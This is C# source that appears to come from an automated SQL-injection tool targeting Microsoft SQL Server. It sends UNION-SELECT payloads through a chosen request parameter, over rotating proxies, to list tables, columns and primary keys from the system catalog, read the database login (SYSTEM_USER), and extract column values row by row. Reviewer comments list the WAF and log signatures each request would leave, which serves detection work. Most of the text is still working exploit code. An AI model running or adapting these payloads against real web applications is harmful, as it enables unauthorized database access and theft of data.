        /// <summary>
        /// Reads one column definition (name, SQL type, primary-key flag) for a column of
        /// table <paramref name="TableID"/> whose colid is greater than <paramref name="FieldID"/>,
        /// by sending two UNION-SELECT payloads through the configured attack parameter
        /// and parsing the rendered responses. Which of the matching rows is surfaced
        /// depends on the ParsePage helper, which is not visible here.
        /// </summary>
        /// <param name="TableID">sysobjects id of the table being enumerated.</param>
        /// <param name="FieldID">colid of the previously read column; the WHERE clause asks for colid greater than this.</param>
        /// <returns>
        /// A <see cref="GlobalDS.Field"/> with <c>FieldName</c> and <c>DataType</c> set from the
        /// first response; <c>IsPrimary</c> is only assigned when the second response is non-empty.
        /// </returns>
        /// <remarks>
        /// Detection note (review): both requests carry literal references to the MSSQL
        /// system catalog (<c>syscolumns</c>, <c>sysconstraints</c>) and <c>char(58)</c>
        /// string concatenation inside the injected parameter. Those tokens are high-signal
        /// matches for WAF rules and request logging, and on the database side a query log
        /// will show catalog reads issued by the application account.
        /// </remarks>
        private GlobalDS.Field GetFieldData(long TableID, int FieldID)
        {
            GlobalDS.Field retVal = new GlobalDS.Field();

            StringBuilder WhereClause = new StringBuilder();

            // WHERE clause assembled by plain concatenation: "id=<TableID> and colid > <FieldID>".
            WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);

            // First payload: column name, a ':' separator (char(58)) and the column's xtype, read from syscolumns.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());


            // Request is sent through the rotating proxy with the configured cookies, credentials and user agent.
            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            // Pull the injected row text back out of the response body.
            string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Expected shape is "name:xtype"; values[1] must exist and be numeric for the
            // two assignments below (IndexOutOfRange / FormatException otherwise).
            string[] values = PulledData.Split(':');

            retVal.FieldName = values[0];
            retVal.DataType  = GetSqlDataType(Convert.ToInt64(values[1].Trim()));

            // Second payload: ':' followed by the sysconstraints status value for this exact (id, colid).
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (PulledData.Length > 0)
            {
                // Drop the leading char(58) delimiter, then test bit 0 of the status value.
                PulledData       = PulledData.Substring(1, PulledData.Length - 1);
                retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
            }

            return(retVal);
        }
        /// <summary>
        /// Reads the name, object id and row count of a table whose sysobjects id is greater
        /// than <paramref name="PreviousTableID"/>, using two UNION-SELECT payloads sent through
        /// the configured attack parameter. Which of the matching rows is surfaced depends on
        /// the ParsePage helper, which is not visible here.
        /// </summary>
        /// <param name="PreviousTableID">sysobjects id of the previously retrieved table.</param>
        /// <returns>
        /// A <see cref="GlobalDS.Table"/> with <c>Name</c>, <c>ObjectID</c> and <c>RecordCount</c> set;
        /// <c>RecordCount</c> is <c>-1</c> when the count response came back empty.
        /// </returns>
        /// <remarks>
        /// Detection note (review): the first request names <c>sysobjects</c> and filters on
        /// <c>xtype=char(85)</c> (ASCII 'U'); the second interpolates the table name returned by
        /// the first into a <c>count(*)</c> query. Both carry <c>char(58)</c> / <c>convert(</c>
        /// tokens in the injected parameter, which are straightforward to match in request
        /// logs or WAF rules.
        /// </remarks>
        private GlobalDS.Table RetrieveTable(long PreviousTableID)
        {
            GlobalDS.Table retVal = new GlobalDS.Table();

            // First payload: "name:id" from sysobjects, restricted to xtype 'U' and id > PreviousTableID.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());

            string ResultPage, ResultText;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Expected shape is "name:id"; values[1] must exist and be numeric for the
            // assignments below (IndexOutOfRange / FormatException otherwise).
            string[] values = ResultText.Split(':');

            retVal.Name     = values[0];
            retVal.ObjectID = Convert.ToInt64(values[1]);

            // Second payload: ':' followed by count(*) of the table just named (values[0] is
            // placed straight into the query as the table name; no WHERE clause).
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            if (ResultText.Length > 0)
            {
                // Drop the leading char(58) delimiter before parsing the count.
                ResultText = ResultText.Substring(1, ResultText.Length - 1);

                retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
            }
            else
            {
                // Sentinel: the count could not be read from the response.
                retVal.RecordCount = -1;
            }
            return(retVal);
        }
        /// <summary>
        /// Pull the username the database is running as
        /// </summary>
        /// <returns>The database username, with the surrounding parentheses stripped.</returns>
        /// <remarks>
        /// The payload wraps <c>SYSTEM_USER</c> in <c>char(40)</c> / <c>char(41)</c> (ASCII '(' and ')')
        /// so the value can be located in the response and trimmed below. The trailing
        /// <c>Substring</c> assumes the parsed text is at least two characters long.
        /// Detection note (review): a request parameter containing <c>SYSTEM_USER</c> together
        /// with <c>char(</c> concatenation is an unambiguous injection signature for WAF and
        /// request-log rules.
        /// </remarks>
        public string GetDatabaseUsername()
        {
            // Payload: "(" + SYSTEM_USER + ")" with no table and no WHERE clause.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);

            string ResultPage;

            ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);

            string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            return(Username.Substring(1, Username.Length - 2));          // remove the '(' and ')' delimiters
        }
        // }}}

        // {{{ GetFieldData
        /// <summary>
        /// Reads the value of one column of one row, identified by the primary-key
        /// name/value pair in <paramref name="pk"/>, via a UNION-SELECT payload sent through
        /// the configured attack parameter.
        /// </summary>
        /// <param name="TableName">Table the column belongs to; placed directly into the generated query.</param>
        /// <param name="Column">Column to read; its <c>DataType</c> selects the branch of the switch below.</param>
        /// <param name="pk">Primary key of the row; when <paramref name="Column"/> is the key column itself, <c>pk.Value</c> is returned without any request.</param>
        /// <returns>
        /// A <see cref="DictionaryEntry"/> whose <c>Key</c> is the column name and whose <c>Value</c>
        /// is the parsed text with its leading and trailing <c>char(58)</c> delimiters removed.
        /// </returns>
        /// <remarks>
        /// All three non-binary branches of the switch currently build the same select
        /// expression; the commented-out calls suggest they were once handled by separate
        /// helpers. The binary/image branch appends nothing, so for those types the query is
        /// built with an empty select expression. The final <c>Substring</c> assumes the
        /// parsed text is at least two characters long.
        /// Detection note (review): the injected parameter contains <c>char(58) + convert(nvarchar,</c>
        /// around a column name and a <c>&lt;pk&gt; = &lt;value&gt;</c> predicate; repeated
        /// requests of this shape with a varying key value are a clear row-by-row
        /// extraction pattern for rate-based and signature-based alerting.
        /// </remarks>
        private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
        {
            DictionaryEntry retVal = new DictionaryEntry();

            retVal.Key   = Column.FieldName;
            retVal.Value = string.Empty;

            // The key column's value is already known from pk; no request needed.
            if (Column.FieldName.Equals(pk.Name))
            {
                retVal.Value = pk.Value;
                return(retVal);
            }

            StringBuilder SelectClause = new StringBuilder();


            switch (Column.DataType)
            {
            case SqlDbType.BigInt:
            case SqlDbType.SmallInt:
            case SqlDbType.TinyInt:
            case SqlDbType.Int:
            case SqlDbType.Decimal:
            case SqlDbType.DateTime:
            case SqlDbType.Money:
            case SqlDbType.Float:
            case SqlDbType.Real:
            case SqlDbType.SmallDateTime:
            case SqlDbType.SmallMoney:
            case SqlDbType.Timestamp:
            case SqlDbType.UniqueIdentifier:
                //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
                // Numeric / date types: ':' + convert(nvarchar, <column>) + ':'.
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");

                break;

            case SqlDbType.NChar:
            case SqlDbType.Char:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
            case SqlDbType.NText:
            case SqlDbType.VarChar:
                //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
                // Character types: identical select expression to the numeric branch.
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Bit:
                //retVal.Value = GetBitField(Column.FieldName, TableName, pk);
                // Bit: identical select expression to the branches above.
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Image:
            case SqlDbType.Binary:
            case SqlDbType.VarBinary:
                // TODO: Figure out how to support this!
                //retVal.Value = null;
                // Nothing appended: SelectClause stays empty for binary types.
                break;
            }

            // WHERE clause is "<pk.Name> = <pk.Value>" by plain concatenation; pk.Value is not quoted or escaped here.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);


            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Strip the leading and trailing char(58) delimiters added by the select expression.
            retVal.Value = ResultText.Substring(1, ResultText.Length - 2);

            return(retVal);
        }